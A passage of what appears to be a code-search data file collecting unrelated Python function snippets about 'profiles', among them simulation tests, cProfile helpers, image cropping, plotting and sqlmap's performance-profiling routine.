default_driver, default_vehicle)\n spawn_not_in_list = SpawningProfile(\"spawn3\", default_driver, default_vehicle)\n\n i.add_spawning_profile(default_spawn)\n i.add_spawning_profile(spawn2)\n\n assert len(i.get_spawning_profile_list()) == 2\n\n i.remove_spawning_profile(spawn_not_in_list)\n\n assert len(i.get_spawning_profile_list()) == 2\n\n i.remove_spawning_profile(spawn2)\n\n assert len(i.get_spawning_profile_list()) == 1\n\n i.remove_spawning_profile(default_spawn)\n\n assert len(i.get_spawning_profile_list()) == 0\n assert not i.get_spawning_profile_list()", "def _profile(self) -> None:\n if self.use_case.profile:\n if self._profile_stats is None:\n self._profile_stats = pstats.Stats()\n if self._current_profiler is not None:\n self._current_profiler.disable()\n self._profile_stats.add(self._current_profiler)\n # TODO: use clear() instead of always creating a new profile\n self._current_profiler = cProfile.Profile()\n self._current_profiler.enable()", "def prepocessImg(self, method, size, img, bb,offset=0.3,gray=True,\n boundry=False, outputDebug=False,outputprefix=None):\n if method == 'crop':\n crop_img = crop_only(img,bb.left(),bb.top(),bb.width(),bb.height(),offset,size)\n elif method == 'affine':\n img = Image.fromarray(img)\n if self.predictor == None:\n raise Exception(\"Error: method affine should initial with an facepredictor.\")\n alignPoints = self.align(img, bb)\n (xs, ys) = zip(*alignPoints)\n (l, r, t, b) = (min(xs), max(xs), min(ys), max(ys))\n w,h = img.size\n if boundry and (l < 0 or r > w or t < 0 or b > h):\n raise AliError('face out of boundry')\n \n left_eye_l = alignPoints[36]\n left_eye_r = alignPoints[39]\n left_eye = (np.array(left_eye_l)+np.array(left_eye_r))/2\n right_eye_l = alignPoints[42]\n right_eye_r = alignPoints[45]\n right_eye = (np.array(right_eye_l)+np.array(right_eye_r))/2\n crop_img = crop_simi(img,left_eye,right_eye,(offset,offset),(size,size))\n im_buffer = cStringIO.StringIO()\n crop_img.save(im_buffer, format=\"JPEG\")\n im_str = base64.b64encode(im_buffer.getvalue())\n else:\n raise Exception(\"undefined crop method\")\n if gray:\n crop_img = crop_img.convert('L')\n if outputDebug:\n dirname = './aligndebug'\n if not os.path.exists(os.path.abspath(dirname)):\n os.mkdir(dirname)\n drawbox(img,(bb.left(),bb.right(),bb.top(),bb.bottom()))\n if method == 'affine':\n drawpoint(img,left_eye)\n drawpoint(img,right_eye)\n img.save('{}/{}_annotated.jpg'.format(dirname,outputprefix))\n crop_img.save('{}/{}_crop.jpg'.format(dirname,outputprefix))\n crop_img = np.array(crop_img,dtype=np.float32) #look carefully on data format\n if crop_img.ndim == 3: #data shape for caffe\n return crop_img,score\n elif crop_img.ndim == 2:\n bbox = [bb.left(),bb.top(),bb.right(),bb.bottom()]\n return crop_img[:,:,np.newaxis], bbox\n else:\n raise Exception(\"wrong dimension\")", "def test_add_spawning_profile():\n center = Coordinates(1 , 1)\n radius = 10\n speed_limit = 20\n\n i = Intersection(center, radius, speed_limit)\n\n assert not i.get_spawning_profile_list()\n\n default_driver = DriverProfile(\"Default\", 8, 2, 2, 0, 30, 3, 1)\n default_vehicle = VehicleProfile(\"Default\", 5, 15, 2, 2, 1000, 65)\n default_spawn = SpawningProfile(\"Default\", default_driver, default_vehicle)\n spawn2 = SpawningProfile(\"spawn2\", default_driver, default_vehicle)\n\n i.add_spawning_profile(default_spawn)\n\n assert i.get_spawning_profile_list()\n assert len(i.get_spawning_profile_list()) == 1\n\n i.add_spawning_profile(spawn2)\n\n assert len(i.get_spawning_profile_list()) == 2", "def test_remove_spawning_profile_from_intersection():\n tester = TestClass()\n intersections = tester.add_spawning_profile_to_intersection()\n\n for i in intersections:\n if len(i.get_spawning_profile_list()) != 0:\n assert True\n\n for spawn in i.get_spawning_profile_list():\n if spawn.get_spawning_profile_name() == 'Default':\n assert True\n break\n\n tester.delete_spawning_profile_from_intersection()\n\n for i in intersections:\n if len(i.get_spawning_profile_list()) == 0:\n assert True", "def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):\n\n try:\n __import__(\"gobject\")\n from thirdparty.gprof2dot import gprof2dot\n from thirdparty.xdot import xdot\n import gtk\n import pydot\n except ImportError as ex:\n errMsg = \"profiling requires third-party libraries ('%s') \" % getSafeExString(ex)\n errMsg += \"(Hint: 'sudo apt-get install python-pydot python-pyparsing python-profiler graphviz')\"\n logger.error(errMsg)\n\n return\n\n if profileOutputFile is None:\n profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"sqlmap_profile.raw\")\n\n if dotOutputFile is None:\n dotOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"sqlmap_profile.dot\")\n\n if imageOutputFile is None:\n imageOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"sqlmap_profile.png\")\n\n if os.path.exists(profileOutputFile):\n os.remove(profileOutputFile)\n\n if os.path.exists(dotOutputFile):\n os.remove(dotOutputFile)\n\n if os.path.exists(imageOutputFile):\n os.remove(imageOutputFile)\n\n infoMsg = \"profiling the execution into file '%s'\" % profileOutputFile\n logger.info(infoMsg)\n\n # Start sqlmap main function and generate a raw profile file\n cProfile.run(\"start()\", profileOutputFile)\n\n infoMsg = \"converting profile data into a dot file '%s'\" % dotOutputFile\n logger.info(infoMsg)\n\n # Create dot file by using extra/gprof2dot/gprof2dot.py\n # http://code.google.com/p/jrfonseca/wiki/Gprof2Dot\n dotFilePointer = codecs.open(dotOutputFile, 'wt', UNICODE_ENCODING)\n parser = gprof2dot.PstatsParser(profileOutputFile)\n profile = parser.parse()\n profile.prune(0.5 / 100.0, 0.1 / 100.0)\n dot = gprof2dot.DotWriter(dotFilePointer)\n dot.graph(profile, gprof2dot.TEMPERATURE_COLORMAP)\n dotFilePointer.close()\n\n infoMsg = \"converting dot file into a graph image '%s'\" % imageOutputFile\n logger.info(infoMsg)\n\n # Create graph image (png) by using pydot (python-pydot)\n # http://code.google.com/p/pydot/\n pydotGraph = pydot.graph_from_dot_file(dotOutputFile)\n\n # Reference: http://stackoverflow.com/questions/38176472/graph-write-pdfiris-pdf-attributeerror-list-object-has-no-attribute-writ\n if isinstance(pydotGraph, list):\n pydotGraph = pydotGraph[0]\n\n try:\n pydotGraph.write_png(imageOutputFile)\n except OSError:\n errMsg = \"profiling requires graphviz installed \"\n errMsg += \"(Hint: 'sudo apt-get install graphviz')\"\n logger.error(errMsg)\n else:\n infoMsg = \"displaying interactive graph with xdot library\"\n logger.info(infoMsg)\n\n # Display interactive Graphviz dot file by using extra/xdot/xdot.py\n # http://code.google.com/p/jrfonseca/wiki/XDot\n win = xdot.DotWindow()\n win.connect('destroy', gtk.main_quit)\n win.set_filter(\"dot\")\n win.open_file(dotOutputFile)\n gtk.main()", "def paintAvatar(self):\n self.paintBody()\n self.paintShoes()\n if self.avatarConfiguration[\"gender\"] == \"boy\":\n self.paintShirt()\n self.paintTrousers()\n else:\n self.paintSkirt()\n self.paintHead()\n self.paintHair()\n self.paintMask()", "def __init__(self, velocity, vorticity, prof_coords, \n direction, beginMeanComput, **kwds):\n assert 'variables' not in kwds, 'variables parameter is useless.'\n super(Profiles, self).__init__(variables=[velocity, vorticity],\n **kwds)\n ## velocity field\n self.velocity = velocity\n ## vorticity field\n self.vorticity = vorticity\n ## X and Y coordinates of the profile\n self.prof_coords = prof_coords\n ## profile direction (0, 1 or 2)\n self.direction = direction\n ## time at which the computation of mean profile must begin\n self.beginMeanComput = beginMeanComput\n self.input = [velocity, vorticity]\n self.output = []", "def onSkipSegLimit(self):\r\n profprint()\r\n #research\r\n logic = self.logic\r\n logic.placeAxialLimitMarker(assign=False)", "def profile(args):\n\n if not args.first_batches_to_skip < args.max_batch_num:\n raise ValueError(\"arg 'first_batches_to_skip' must be smaller than \"\n \"'max_batch_num'.\")\n if not args.first_batches_to_skip >= 0:\n raise ValueError(\n \"arg 'first_batches_to_skip' must not be smaller than 0.\")\n\n _, avg_cost, accuracy = stacked_lstmp_model(\n frame_dim=args.frame_dim,\n hidden_dim=args.hidden_dim,\n proj_dim=args.proj_dim,\n stacked_num=args.stacked_num,\n class_num=args.class_num,\n parallel=args.parallel)\n\n optimizer = fluid.optimizer.Adam(\n learning_rate=fluid.layers.exponential_decay(\n learning_rate=args.learning_rate,\n decay_steps=1879,\n decay_rate=1 / 1.2,\n staircase=True))\n optimizer.minimize(avg_cost)\n\n place = fluid.CPUPlace() if args.device == 'CPU' else fluid.CUDAPlace(0)\n exe = fluid.Executor(place)\n exe.run(fluid.default_startup_program())\n\n ltrans = [\n trans_add_delta.TransAddDelta(2, 2),\n trans_mean_variance_norm.TransMeanVarianceNorm(args.mean_var),\n trans_splice.TransSplice(5, 5), trans_delay.TransDelay(5)\n ]\n\n data_reader = reader.AsyncDataReader(\n args.feature_lst, args.label_lst, -1, split_sentence_threshold=1024)\n data_reader.set_transformers(ltrans)\n\n feature_t = fluid.LoDTensor()\n label_t = fluid.LoDTensor()\n\n sorted_key = None if args.sorted_key is 'None' else args.sorted_key\n with profiler.profiler(args.device, sorted_key) as prof:\n frames_seen, start_time = 0, 0.0\n for batch_id, batch_data in enumerate(\n data_reader.batch_iterator(args.batch_size,\n args.minimum_batch_size)):\n if batch_id >= args.max_batch_num:\n break\n if args.first_batches_to_skip == batch_id:\n profiler.reset_profiler()\n start_time = time.time()\n frames_seen = 0\n # load_data\n (features, labels, lod, _) = batch_data\n features = np.reshape(features, (-1, 11, 3, args.frame_dim))\n features = np.transpose(features, (0, 2, 1, 3))\n feature_t.set(features, place)\n feature_t.set_lod([lod])\n label_t.set(labels, place)\n label_t.set_lod([lod])\n\n frames_seen += lod[-1]\n\n outs = exe.run(fluid.default_main_program(),\n feed={\"feature\": feature_t,\n \"label\": label_t},\n fetch_list=[avg_cost, accuracy]\n if args.print_train_acc else [],\n return_numpy=False)\n\n if args.print_train_acc:\n print(\"Batch %d acc: %f\" %\n (batch_id, lodtensor_to_ndarray(outs[1])[0]))\n else:\n sys.stdout.write('.')\n sys.stdout.flush()\n time_consumed = time.time() - start_time\n frames_per_sec = frames_seen / time_consumed\n print(\"\\nTime consumed: %f s, performance: %f frames/s.\" %\n (time_consumed, frames_per_sec))", "def _enable_profiling():\n import cProfile\n import atexit\n global _profiler\n _profiler = cProfile.Profile()\n _profiler.enable()\n atexit.register(_profile_atexit)", "def testProfile2D(self):\n self.plot = StackView()\n self.plot.show()\n self.qWaitForWindowExposed(self.plot)\n\n self.plot.setStack(numpy.array([[[0, 1], [2, 3]],\n [[4, 5], [6, 7]]]))\n\n toolBar = self.plot.getProfileToolbar()\n\n manager = toolBar.getProfileManager()\n roiManager = manager.getRoiManager()\n\n roi = rois.ProfileImageStackHorizontalLineROI()\n roi.setPosition(0.5)\n roi.setProfileType(\"2D\")\n roiManager.addRoi(roi)\n roiManager.setCurrentRoi(roi)\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n profileWindow = roi.getProfileWindow()\n self.assertIsInstance(roi.getProfileWindow(), qt.QMainWindow)\n self.assertIsInstance(profileWindow.getCurrentPlotWidget(), Plot2D)\n\n roi.setProfileType(\"1D\")\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n profileWindow = roi.getProfileWindow()\n self.assertIsInstance(roi.getProfileWindow(), qt.QMainWindow)\n self.assertIsInstance(profileWindow.getCurrentPlotWidget(), Plot1D)", "def __init__(\n self,\n img_path: Union[str, \"Path\"],\n profile: dict,\n crop_size: int,\n padding: int = 0,\n **kwargs\n ):\n super().__init__()\n self.img_path = img_path\n self.crop_size = crop_size\n self.padding = padding\n\n profile.update(blockxsize=crop_size, blockysize=crop_size, tiled=True, **kwargs)\n\n # Create the file and get the indices of write locations\n with rasterio.open(self.img_path, \"w\", **profile) as dst:\n self.height = dst.height\n self.width = dst.width\n self.profile = dst.profile\n\n _y0s = range(0, self.height, self.crop_size)\n _x0s = range(0, self.width, self.crop_size)\n self.y0x0 = list(itertools.product(_y0s, _x0s))", "def test_add_spawning_profile_to_intersection():\n tester = TestClass()\n intersections = tester.add_spawning_profile_to_intersection()\n\n attached = False\n\n for i in intersections:\n for spawn in i.get_spawning_profile_list():\n if spawn.get_spawning_profile_name() == 'Default':\n attached = True\n break;\n\n assert attached", "def trace_base(opt_model, pupil, fld, wvl, apply_vignetting=True, **kwargs):\n vig_pupil = fld.apply_vignetting(pupil) if apply_vignetting else pupil\n osp = opt_model.optical_spec\n fod = opt_model['analysis_results']['parax_data'].fod\n eprad = fod.enp_radius\n aim_pt = np.array([0., 0.])\n if hasattr(fld, 'aim_pt') and fld.aim_pt is not None:\n aim_pt = fld.aim_pt\n pt1 = np.array([eprad*vig_pupil[0]+aim_pt[0], eprad*vig_pupil[1]+aim_pt[1],\n fod.obj_dist+fod.enp_dist])\n pt0 = osp.obj_coords(fld)\n dir0 = pt1 - pt0\n length = norm(dir0)\n dir0 = dir0/length\n sm = opt_model.seq_model\n # To handle virtual object distances, always propagate from \n # the object in a positive Z direction.\n if dir0[2] * sm.z_dir[0] < 0:\n dir0 = -dir0\n return rt.trace(sm, pt0, dir0, wvl, **kwargs)", "def apply_double_profile(plotDict, args=None):\n\tif not 'prof' in plotDict['tree_draw_options'] or 'profs' in plotDict['tree_draw_options']:\n\t\tif isinstance(plotDict['tree_draw_options'], basestring):\n\t\t\tplotDict['tree_draw_options'] = [plotDict['tree_draw_options']]\n\t\tplotDict['tree_draw_options'].append('prof')\n\t# Parameter List Expansion\n\t# the x vs x profile must be an exakt match of y vs x\n\t# we thus must replicate all settings for their position to match\n\t# settings we need to replicate in a controlled fashion\n\tinput_root_opts = ['nicks', 'x_expressions', 'y_expressions', 'z_expressions', 'x_bins', 'y_bins', 'z_bins', 'scale_factors', 'files', 'directories', 'folders', 'weights', 'friend_trees', 'tree_draw_options']\n\t\n\tif not plotDict.get('files'):\n\t\tplotDict['files'] = get_input_files(args)[0]\n\t# make sure all n-length (non-0,1) objects have the same size\n\topt_n_length_max = max(len(plotDict.get(opt_name, ())) for opt_name in input_root_opts if not isinstance(plotDict.get(opt_name), str))\n\tassert opt_n_length_max > 0, 'Cannot expand empty plot definition'\n\tfor opt_name in input_root_opts:\n\t\tif opt_name not in plotDict or isinstance(plotDict[opt_name], str):\n\t\t\tcontinue\n\t\tassert len(plotDict[opt_name]) <= 1 or len(plotDict[opt_name]) == opt_n_length_max, \"Replication requires all input_root options to be either of 0, 1 or same max length ('%s' is %d/%d)\" % (opt_name, len(plotDict[opt_name]), opt_n_length_max)\n\t\t# TODO: dunno if checking for None is required, saw this in HP - MF@20151130\n\t\tif not plotDict[opt_name] or plotDict[opt_name][0] is None:\n\t\t\tcontinue\n\t\tif len(plotDict[opt_name]) == 1:\n\t\t\tplotDict[opt_name] = plotDict[opt_name] * opt_n_length_max\n\t\t# never modify inplace - input may be mutable and used elsewhere/recursively\n\t\tplotDict[opt_name] = plotDict[opt_name][:] * 2\n\tif not plotDict.get('nicks') or plotDict['nicks'][0] is None:\n\t\tplotDict['nicks'] = [\"nick%d\" % nick for nick in xrange(len(plotDict['y_expressions']))]\n\t# X-Y Profile matching\n\t# explicitly create new x profiles\n\tplotDict['y_expressions'] = plotDict['y_expressions'][:opt_n_length_max] + plotDict['x_expressions'][opt_n_length_max:]\n\tplotDict['nicks'] = plotDict['nicks'][opt_n_length_max:] + ['%s_x_prof' % nick for nick in plotDict['nicks'][:opt_n_length_max]]\n\t# create new y vs <x> graphs\n\tplotDict['analysis_modules'] = plotDict.get('analysis_modules', [])[:]\n\tplotDict['analysis_modules'].insert(0, 'TGraphFromHistograms')\n\tplotDict['tgraph_strip_empty'] = 'any'\n\tplotDict['tgraph_y_nicks'] = plotDict['nicks'][:opt_n_length_max]\n\tplotDict['tgraph_x_nicks'] = plotDict['nicks'][opt_n_length_max:]\n\tplotDict['tgraph_result_nicks'] = ['%s_vs_x_prof' % nick for nick in plotDict['nicks'][:opt_n_length_max]]\n\t# disable source plots\n\tplotDict['nicks_blacklist'] = [r'^%s$' % nick for nick in plotDict['nicks']]\n\treturn plotDict", "def testMethodProfile2D(self):\n\n toolBar = self.plot.getProfileToolbar()\n\n toolBar.vLineAction.trigger()\n plot2D = self.plot.getPlotWidget().getWidgetHandle()\n pos1 = plot2D.width() * 0.5, plot2D.height() * 0.5\n self.mouseClick(plot2D, qt.Qt.LeftButton, pos=pos1)\n\n manager = toolBar.getProfileManager()\n roi = manager.getCurrentRoi()\n roi.setProfileMethod(\"mean\")\n roi.setProfileType(\"2D\")\n roi.setProfileLineWidth(3)\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n # check 2D 'mean' profile\n profilePlot = roi.getProfileWindow().getCurrentPlotWidget()\n data = profilePlot.getAllImages()[0].getData()\n expected = numpy.array([[1, 4], [7, 10], [13, 16]])\n numpy.testing.assert_almost_equal(data, expected)", "def plot_profile(outdir, xval='x', xscale=1, yscale=1, comp2los=False, adjustRadial=False,\n fig=True):\n #Load data\n path = os.path.join(outdir,'points.h5')\n x,y,z,ux,uy,uz = pu.extract_points(path)\n\n Y = uz / yscale\n if xval == 'x':\n X = x / xscale\n Y1 = ux / yscale\n elif xval == 'r':\n X = np.hypot(x,y) / xscale\n ur = np.hypot(ux,uy)\n Y1 = ur / yscale\n if adjustRadial: #fix sign from hypot square root\n ur = pu.radial2negative(Y1)\n\n if fig:\n plt.figure()\n # otherwise profile added to active plot\n\n #plt.plot(X,uy/yscale,'r.-',label='Uy') #should be zero along EW axis\n de = 90e3 / xscale #eastern data extent\n if comp2los != False:\n data_extents = (X<=de)\n if comp2los == 'west': #switch sign of radial profile\n #ux = -ux #move to comp2los function\n X = -X\n Y1 = -Y1\n de = -de\n data_extents = (X>=de)\n\n los = pu.comp2los(x,ux,uy,uz,track=comp2los)\n plt.plot(X, los/yscale, 'k-', lw=2, label='Ulos_' + comp2los)\n plt.fill_between(X,los/yscale, where=data_extents, color='gray',alpha=0.5)\n\n plt.plot(X, Y, 'b-', lw=2, label='Uz')\n plt.plot(X, Y1, 'b--',lw=2, mfc='None',label='U{0}'.format(xval))\n\n # Annotate\n plt.title(outdir)\n plt.xlabel('Distance [{}]'.format(get_unit(xscale)))\n plt.ylabel('Uz [{}]'.format(get_unit(yscale)))\n plt.axhline(color='k')\n plt.axvline(de,color='k', linestyle='dashed', label='EW data extent') #EW extent of InSAR coverage\n plt.legend(loc='best')\n plt.grid(True)\n plt.show()", "def set_profile(self, profile='default'):\n\n # parameters used by various subclasses\n # each set is indexed by a name, called a profile\n # Note that each parameter must also be listed in set_params method in order to get set\n self.profile = profile\n self.params = {\n 'default' : {\n 'chans': n.array(range(5,59)), # channels to read\n 'dmarr' : [44.,88.], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.0, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': -107.6177, # longitude of the array center (vla)\n 'lat': 34.07875 # latitude of the array center (vla)\n },\n 'vlacrab' : {\n 'chans': n.array(range(5,59)), # channels to read\n 'dmarr' : [29.,58.], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.0, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': -107.6177, # longitude of the array center\n 'lat': 34.07875 # latitude of the array center\n },\n 'psa' : {\n 'chans': n.array(range(140,150)), # channels to read\n 'dmarr' : [0.], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.0, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': 21.411, # longitude of the array center\n 'lat': -30.721 # latitude of the array center\n },\n 'pocob0329' : {\n 'chans': n.array(range(5,59)), # channels to read\n 'dmarr' : [0, 13.4, 26.8, 40.2, 53.5], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.005, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': -121.470, # longitude of the array center\n 'lat': 40.817 # latitude of the array center\n },\n 'mwa' : {\n 'chans': n.array(n.arange(128)), # channels to read\n 'dmarr' : [0, 50.], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.0, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': 116.671, # longitude of the array center\n 'lat': -26.703 # latitude of the array center\n }\n }\n\n \n self.pathout = self.params[self.profile]['pathout']\n self.chans = self.params[self.profile]['chans']\n self.dmarr = self.params[self.profile]['dmarr']\n self.pulsewidth = self.params[self.profile]['pulsewidth'] * n.ones(len(self.chans))\n self.approxuvw = self.params[self.profile]['approxuvw']\n self.beam_params = self.params[self.profile]['beam_params']\n self.long = self.params[self.profile]['long']\n self.lat = self.params[self.profile]['lat']", "def pre_draw(p5_instance, draw_func):\n global _CTX_MIDDLE, _DEFAULT_FILL, _DEFAULT_LEADMULT, _DEFAULT_STROKE, _DEFAULT_TEXT_FILL\n\n global ADD, ALT, ARROW, AUTO, AUDIO, AXES, BACKSPACE, BASELINE, BEVEL, BEZIER, BLEND, BLUR, BOLD, BOLDITALIC\n global BOTTOM, BURN, CENTER, CHORD, CLAMP, CLOSE, CONTROL, CORNER, CORNERS, CROSS, CURVE, DARKEST\n global DEG_TO_RAD, DEGREES, DELETE, DIFFERENCE, DILATE, DODGE, DOWN_ARROW, ENTER, ERODE, ESCAPE, EXCLUSION\n global FILL, GRAY, GRID, HALF_PI, HAND, HARD_LIGHT, HSB, HSL, IMAGE, IMMEDIATE, INVERT, ITALIC, LANDSCAPE\n global LEFT, LEFT_ARROW, LIGHTEST, LINE_LOOP, LINE_STRIP, LINEAR, LINES, MIRROR, MITER, MOVE, MULTIPLY, NEAREST\n global NORMAL, OPAQUE, OPEN, OPTION, OVERLAY, P2D, PI, PIE, POINTS, PORTRAIT, POSTERIZE, PROJECT, QUAD_STRIP, QUADRATIC\n global QUADS, QUARTER_PI, RAD_TO_DEG, RADIANS, RADIUS, REPEAT, REPLACE, RETURN, RGB, RIGHT, RIGHT_ARROW\n global ROUND, SCREEN, SHIFT, SOFT_LIGHT, SQUARE, STROKE, SUBTRACT, TAB, TAU, TEXT, TEXTURE, THRESHOLD, TOP\n global TRIANGLE_FAN, TRIANGLE_STRIP, TRIANGLES, TWO_PI, UP_ARROW, VIDEO, WAIT, WEBGL\n\n global frameCount, focused, displayWidth, displayHeight, windowWidth, windowHeight, width, height\n global disableFriendlyErrors, deviceOrientation, accelerationX, accelerationY, accelerationZ\n global pAccelerationX, pAccelerationY, pAccelerationZ, rotationX, rotationY, rotationZ\n global pRotationX, pRotationY, pRotationZ, turnAxis, keyIsPressed, key, keyCode, mouseX, mouseY, pmouseX, pmouseY\n global winMouseX, winMouseY, pwinMouseX, pwinMouseY, mouseButton, mouseIsPressed, touches, pixels\n\n _CTX_MIDDLE = p5_instance._CTX_MIDDLE\n _DEFAULT_FILL = p5_instance._DEFAULT_FILL\n _DEFAULT_LEADMULT = p5_instance._DEFAULT_LEADMULT\n _DEFAULT_STROKE = p5_instance._DEFAULT_STROKE\n _DEFAULT_TEXT_FILL = p5_instance._DEFAULT_TEXT_FILL\n\n ADD = p5_instance.ADD\n ALT = p5_instance.ALT\n ARROW = p5_instance.ARROW\n AUDIO = p5_instance.AUDIO\n AUTO = p5_instance.AUTO\n AXES = p5_instance.AXES\n BACKSPACE = p5_instance.BACKSPACE\n BASELINE = p5_instance.BASELINE\n BEVEL = p5_instance.BEVEL\n BEZIER = p5_instance.BEZIER\n BLEND = p5_instance.BLEND\n BLUR = p5_instance.BLUR\n BOLD = p5_instance.BOLD\n BOLDITALIC = p5_instance.BOLDITALIC\n BOTTOM = p5_instance.BOTTOM\n BURN = p5_instance.BURN\n CENTER = p5_instance.CENTER\n CHORD = p5_instance.CHORD\n CLAMP = p5_instance.CLAMP\n CLOSE = p5_instance.CLOSE\n CONTROL = p5_instance.CONTROL\n CORNER = p5_instance.CORNER\n CORNERS = p5_instance.CORNERS\n CROSS = p5_instance.CROSS\n CURVE = p5_instance.CURVE\n DARKEST = p5_instance.DARKEST\n DEG_TO_RAD = p5_instance.DEG_TO_RAD\n DEGREES = p5_instance.DEGREES\n DELETE = p5_instance.DELETE\n DIFFERENCE = p5_instance.DIFFERENCE\n DILATE = p5_instance.DILATE\n DODGE = p5_instance.DODGE\n DOWN_ARROW = p5_instance.DOWN_ARROW\n ENTER = p5_instance.ENTER\n ERODE = p5_instance.ERODE\n ESCAPE = p5_instance.ESCAPE\n EXCLUSION = p5_instance.EXCLUSION\n FILL = p5_instance.FILL\n GRAY = p5_instance.GRAY\n GRID = p5_instance.GRID\n HALF_PI = p5_instance.HALF_PI\n HAND = p5_instance.HAND\n HARD_LIGHT = p5_instance.HARD_LIGHT\n HSB = p5_instance.HSB\n HSL = p5_instance.HSL\n IMAGE = p5_instance.IMAGE\n IMMEDIATE = p5_instance.IMMEDIATE\n INVERT = p5_instance.INVERT\n ITALIC = p5_instance.ITALIC\n LANDSCAPE = p5_instance.LANDSCAPE\n LEFT = p5_instance.LEFT\n LEFT_ARROW = p5_instance.LEFT_ARROW\n LIGHTEST = p5_instance.LIGHTEST\n LINE_LOOP = p5_instance.LINE_LOOP\n LINE_STRIP = p5_instance.LINE_STRIP\n LINEAR = p5_instance.LINEAR\n LINES = p5_instance.LINES\n MIRROR = p5_instance.MIRROR\n MITER = p5_instance.MITER\n MOVE = p5_instance.MOVE\n MULTIPLY = p5_instance.MULTIPLY\n NEAREST = p5_instance.NEAREST\n NORMAL = p5_instance.NORMAL\n OPAQUE = p5_instance.OPAQUE\n OPEN = p5_instance.OPEN\n OPTION = p5_instance.OPTION\n OVERLAY = p5_instance.OVERLAY\n P2D = p5_instance.P2D\n P3D = p5_instance.WEBGL\n PI = p5_instance.PI\n PIE = p5_instance.PIE\n POINTS = p5_instance.POINTS\n PORTRAIT = p5_instance.PORTRAIT\n POSTERIZE = p5_instance.POSTERIZE\n PROJECT = p5_instance.PROJECT\n QUAD_STRIP = p5_instance.QUAD_STRIP\n QUADRATIC = p5_instance.QUADRATIC\n QUADS = p5_instance.QUADS\n QUARTER_PI = p5_instance.QUARTER_PI\n RAD_TO_DEG = p5_instance.RAD_TO_DEG\n RADIANS = p5_instance.RADIANS\n RADIUS = p5_instance.RADIUS\n REPEAT = p5_instance.REPEAT\n REPLACE = p5_instance.REPLACE\n RETURN = p5_instance.RETURN\n RGB = p5_instance.RGB\n RIGHT = p5_instance.RIGHT\n RIGHT_ARROW = p5_instance.RIGHT_ARROW\n ROUND = p5_instance.ROUND\n SCREEN = p5_instance.SCREEN\n SHIFT = p5_instance.SHIFT\n SOFT_LIGHT = p5_instance.SOFT_LIGHT\n SQUARE = p5_instance.SQUARE\n STROKE = p5_instance.STROKE\n SUBTRACT = p5_instance.SUBTRACT\n TAB = p5_instance.TAB\n TAU = p5_instance.TAU\n TEXT = p5_instance.TEXT\n TEXTURE = p5_instance.TEXTURE\n THRESHOLD = p5_instance.THRESHOLD\n TOP = p5_instance.TOP\n TRIANGLE_FAN = p5_instance.TRIANGLE_FAN\n TRIANGLE_STRIP = p5_instance.TRIANGLE_STRIP\n TRIANGLES = p5_instance.TRIANGLES\n TWO_PI = p5_instance.TWO_PI\n UP_ARROW = p5_instance.UP_ARROW\n VIDEO = p5_instance.VIDEO\n WAIT = p5_instance.WAIT\n WEBGL = p5_instance.WEBGL\n\n frameCount = p5_instance.frameCount\n focused = p5_instance.focused\n displayWidth = p5_instance.displayWidth\n displayHeight = p5_instance.displayHeight\n windowWidth = p5_instance.windowWidth\n windowHeight = p5_instance.windowHeight\n width = p5_instance.width\n height = p5_instance.height\n disableFriendlyErrors = p5_instance.disableFriendlyErrors\n deviceOrientation = p5_instance.deviceOrientation\n accelerationX = p5_instance.accelerationX\n accelerationY = p5_instance.accelerationY\n accelerationZ = p5_instance.accelerationZ\n pAccelerationX = p5_instance.pAccelerationX\n pAccelerationY = p5_instance.pAccelerationY\n pAccelerationZ = p5_instance.pAccelerationZ\n rotationX = p5_instance.rotationX\n rotationY = p5_instance.rotationY\n rotationZ = p5_instance.rotationZ\n pRotationX = p5_instance.pRotationX\n pRotationY = p5_instance.pRotationY\n pRotationZ = p5_instance.pRotationZ\n turnAxis = p5_instance.turnAxis\n keyIsPressed = p5_instance.keyIsPressed\n key = p5_instance.key\n keyCode = p5_instance.keyCode\n mouseX = p5_instance.mouseX\n mouseY = p5_instance.mouseY\n pmouseX = p5_instance.pmouseX\n pmouseY = p5_instance.pmouseY\n winMouseX = p5_instance.winMouseX\n winMouseY = p5_instance.winMouseY\n pwinMouseX = p5_instance.pwinMouseX\n pwinMouseY = p5_instance.pwinMouseY\n mouseButton = p5_instance.mouseButton\n mouseIsPressed = p5_instance.mouseIsPressed\n touches = p5_instance.touches\n pixels = p5_instance.pixels\n\n return draw_func()", "def _should_profile(self) -> bool:\n if \"profile\" in self._allowed_plugins:\n if not self._one_shot:\n raise ValueError(\n \"Profile plugin currently only supported for one shot.\"\n )\n logger.info(\"Profile plugin is enalbed.\")\n return True\n return False", "def filterprofile(profile, settings):\n \n if settings.exclude is True and len(profile.description) == 0:\n print(\"EMPTY BIO\")\n return False\n\n if profile.description is None:\n return False\n\n if len(settings.include_keywords) > 1 and not any(kw in 